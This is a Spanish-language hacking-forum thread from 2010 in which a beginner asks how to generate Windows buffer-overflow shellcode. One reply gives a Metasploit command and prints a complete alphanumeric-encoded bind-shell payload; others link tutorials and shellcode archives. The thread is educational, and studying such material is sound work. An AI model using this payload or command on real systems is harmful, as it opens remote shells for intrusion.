Duda manuales bof.

Tema destacado: ¡Aprende hacking con práctica! - arZone, el wargame de elhacker.net

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderador: berz3k)

Duda manuales bof.

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: Duda manuales bof. (Leído 1,565 veces)

PHAMTOM

Desconectado

Mensajes: 83

0x8B,0xEC,0x33,0xFF

Duda manuales bof.

« en: 2 Febrero 2010, 01:10 »

Hola,resulta que me he metido en el mundillo del buffer overflow, e leido manuales tras manuales,y ahora tengo una pregunta.

Como yo por ahora estoy usando windows,hay alguna aplicación de metasploit o algo parecido para general shell codes?? , por ejemplo ejecutar un cmd.exe?

o algun manual completo de buffer overflow para windows?, los que veo son todos para linux.

gracias,saludos.

PHAMTOM


	En línea

Miran a cualquier ventana, mientras su pánico emana
y nubla su visión mi calma es pura precisión
cargo munición y miro tranquilo
ya ni respiro desde al ático os vigilo sigo al filo os tengo a tiro!

La kitchner quiere tanto a los pobres,que cada vez,tiene más

Shell Root

Desconectado

Mensajes: 2.456

Alex Jurado

Re: Duda manuales bof.

« Respuesta #1 en: 2 Febrero 2010, 01:52 »

Wooow hablaron de ShellCodes y del Metasploit. Simon, Claro que si se puede.

Por ejemplo: Supongamos que una application tiene algun filtro y queremos converter nuestro PAYLOAD en una shell de Mayusculas y Minusculas, tendremos que hacer uso de los codificadores (msfencode). Mirad el resultado.

Código:

Shell Root@alex /msf3
$ msfpayload windows/shell/bind_tcp R | msfencode -e x86/alpha_mixed

[*] x86/alpha_mixed succeeded with size 659 (iteration=1)

buf =
"\x89\xe6\xdd\xc1\xd9\x76\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" +
"\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x49\x6c\x49\x78\x4b\x39\x45\x50\x43\x30\x45" +
"\x50\x43\x50\x4c\x49\x4d\x35\x50\x31\x48\x52\x50\x64\x4c" +
"\x4b\x50\x52\x44\x70\x4e\x6b\x42\x72\x46\x6c\x4e\x6b\x50" +
"\x52\x46\x74\x4e\x6b\x51\x62\x51\x38\x44\x4f\x4d\x67\x42" +
"\x6a\x47\x56\x46\x51\x49\x6f\x50\x31\x4b\x70\x4e\x4c\x45" +
"\x6c\x43\x51\x51\x6c\x46\x62\x46\x4c\x45\x70\x4a\x61\x48" +
"\x4f\x44\x4d\x46\x61\x4b\x77\x48\x62\x48\x70\x43\x62\x46" +
"\x37\x4e\x6b\x50\x52\x42\x30\x4c\x4b\x47\x32\x45\x6c\x47" +
"\x71\x4a\x70\x4c\x4b\x43\x70\x44\x38\x4c\x45\x4b\x70\x44" +
"\x34\x43\x7a\x47\x71\x48\x50\x50\x50\x4e\x6b\x47\x38\x46" +
"\x78\x4e\x6b\x42\x78\x47\x50\x43\x31\x4b\x63\x49\x73\x47" +
"\x4c\x47\x39\x4c\x4b\x44\x74\x4e\x6b\x46\x61\x49\x46\x44" +
"\x71\x49\x6f\x45\x61\x4f\x30\x4e\x4c\x4b\x71\x4a\x6f\x44" +
"\x4d\x45\x51\x4f\x37\x46\x58\x4b\x50\x44\x35\x48\x74\x45" +
"\x53\x43\x4d\x4b\x48\x45\x6b\x51\x6d\x46\x44\x50\x75\x4d" +
"\x32\x46\x38\x4e\x6b\x51\x48\x47\x54\x45\x51\x4a\x73\x45" +
"\x36\x4e\x6b\x46\x6c\x50\x4b\x4c\x4b\x51\x48\x45\x4c\x46" +
"\x61\x48\x53\x4c\x4b\x43\x34\x4e\x6b\x46\x61\x48\x50\x4e" +
"\x69\x50\x44\x47\x54\x51\x34\x51\x4b\x43\x6b\x51\x71\x51" +
"\x49\x42\x7a\x50\x51\x4b\x4f\x49\x70\x46\x38\x51\x4f\x42" +
"\x7a\x4e\x6b\x42\x32\x4a\x4b\x4f\x76\x43\x6d\x42\x48\x44" +
"\x73\x45\x62\x45\x50\x47\x70\x43\x58\x51\x67\x51\x63\x46" +
"\x52\x51\x4f\x42\x74\x42\x48\x42\x6c\x51\x67\x46\x46\x46" +
"\x67\x4b\x4f\x4b\x65\x48\x38\x4c\x50\x45\x51\x43\x30\x45" +
"\x50\x46\x49\x4a\x64\x46\x34\x46\x30\x43\x58\x44\x69\x4b" +
"\x30\x42\x4b\x47\x70\x4b\x4f\x49\x45\x50\x50\x46\x30\x42" +
"\x70\x50\x50\x43\x70\x42\x70\x43\x70\x46\x30\x42\x48\x4a" +
"\x4a\x46\x6f\x49\x4f\x4d\x30\x49\x6f\x4e\x35\x4c\x57\x46" +
"\x51\x4b\x6b\x50\x53\x51\x78\x47\x72\x45\x50\x47\x61\x43" +
"\x6c\x4f\x79\x48\x66\x43\x5a\x46\x70\x50\x56\x43\x67\x50" +
"\x68\x48\x42\x49\x4b\x44\x77\x45\x37\x49\x6f\x48\x55\x42" +
"\x73\x51\x47\x43\x58\x4e\x57\x48\x69\x46\x58\x49\x6f\x4b" +
"\x4f\x48\x55\x50\x53\x42\x73\x42\x77\x50\x68\x44\x34\x4a" +
"\x4c\x45\x6b\x4d\x31\x49\x6f\x49\x45\x42\x77\x4c\x57\x43" +
"\x58\x42\x55\x50\x6e\x42\x6d\x45\x31\x49\x6f\x4a\x75\x43" +
"\x5a\x45\x50\x51\x7a\x47\x74\x42\x76\x51\x47\x43\x58\x43" +
"\x32\x4e\x39\x4b\x78\x43\x6f\x4b\x4f\x4a\x75\x4e\x6b\x50" +
"\x36\x42\x4a\x43\x70\x45\x38\x43\x30\x42\x30\x47\x70\x43" +
"\x30\x42\x76\x51\x7a\x43\x30\x50\x68\x43\x68\x4c\x64\x46" +
"\x33\x49\x75\x49\x6f\x4b\x65\x4d\x43\x43\x63\x43\x5a\x45" +
"\x50\x50\x56\x46\x33\x46\x37\x45\x38\x43\x32\x4e\x39\x49" +
"\x58\x43\x6f\x49\x6f\x4a\x75\x46\x61\x4b\x73\x45\x79\x4f" +
"\x36\x4b\x35\x4a\x56\x50\x75\x48\x6c\x4a\x63\x47\x7a\x41" +
"\x41"

Ahora miremos la ShellCode resultante. (Recordad lo que dije al inicio, '...queremos converter nuestro PAYLOAD en una shell de Mayusculas...')

Saludos!


	En línea

---

08l00D

Desconectado

Mensajes: 168

Re: Duda manuales bof.

« Respuesta #2 en: 2 Febrero 2010, 16:22 »

Cita de: H-PHAMTOM en 2 Febrero 2010, 01:10

Como yo por ahora estoy usando windows,hay alguna aplicación de metasploit o algo parecido para general shell codes?? , por ejemplo ejecutar un cmd.exe?

Creo que hay una aplicacion para linux llamada hellkit que hace eso, lo que no se esta para windows..
Igualmente podes fijarte en milw0rm hay cientos de shellcodes ya hechas ... por ahi te podes encontrar una que haga lo que vos queres....


	En línea

ikary

Desconectado

Mensajes: 127

Re: Duda manuales bof.

« Respuesta #3 en: 2 Febrero 2010, 18:01 »

Saludos.
Para el tema Buffer Overflow y de crear shellcodes especificos (como abrir un cmd.exe) en windows, hay un manual en este foro escrito por Rojodos de lectura obligatoria

...pero no encuentro el post XDD
Como lo tenia por mi disco guardado te lo subo a rapidshare:
http://rapidshare.com/files/344890930/Exploits_y_Stack_Overflows_en_Windows-1.txt.html

Además subo un articulo de NetSearch Ezine que tampoco tiene desperdicio:
http://rapidshare.com/files/344891168/ns7-0x03.txt.html

Si quieres shellcodes mas complejas te recomiendo los shellcodes proporcionados por metaspoit en su pagina de prueba www.metasploit.com:55555/

En esta pagina, en la sección de PAYLOADS, selecciona el sistema operativo en Filter Modules (os::win32) y selecciona uno de los que te proponen (Para hacer pruebas te recomiendo "Windows Execute Command" con el que puedes elegir lo que quieres ejecutar) ademas de muchos mas...

EDITO para incluir mas tutoriales.

Bueno, estos tutoriales te doy la pagina por que tarda mucho en subirlo a rapidshare

Estos manuales me ayudaron mucho a empezar, explica muy detalladamente todo el proceso para crear un exploit, con imagenes y, al final del documento hay un video muy explicativo. Te los recomiendo para empezar:
http://www.phoenixbit.com/site/tutorials.asp?view=U2VjdXJpdHkgKEhhY2tpbmcpL2J1ZmZlciBvdmVyZmxvdyBwYXJ0MQ <-- 1a parte
http://www.phoenixbit.com/site/tutorials.asp?view=U2VjdXJpdHkgKEhhY2tpbmcpL2J1ZmZlciBvdmVyZmxvdyBwYXJ0Mg <-- 2a parte

PD: Estos 2 ultimos manuales estan en ingles, pero sencillo de entender

Bueno, espero que te sirva y si tienes cualquier duda comenta ^^

Yo estuve igual hace muy poquito: http://foro.elhacker.net/bugs_y_exploits/buffer_overflow_ayuda-t282570.0.html :silbar:

Un saludo.


« Última modificación: 2 Febrero 2010, 18:24 por ikary »	En línea

PHAMTOM

Desconectado

Mensajes: 83

0x8B,0xEC,0x33,0xFF

Re: Duda manuales bof.

« Respuesta #4 en: 3 Febrero 2010, 01:35 »

Muchisimas gracias,una muy buena respuesta,me saco el sombrero..

..

Ahora mismo llego a mi casa y me pongo a leer los manuales.....

[00]__[00]
|Gracias |
------------


	En línea

ikary

Desconectado

Mensajes: 127

Re: Duda manuales bof.

« Respuesta #5 en: 3 Febrero 2010, 17:04 »

De nada, me alegra que te haya servido

Por cierto, olvide darte la referencia al Torneo Shell que se hizo en la zona wargames de elhacker.net :silbar:

Son para FreeBSD pero son bastante interesantes y merece mucho la pena leerlo.
https://foro.elhacker.net/warzone/documentacion_torneo_shell-t251468.0.html

Un saludo, y recuerda postear cualquier duda (el comienzo es lo peor

)


	En línea

Páginas: [1]

Ir a: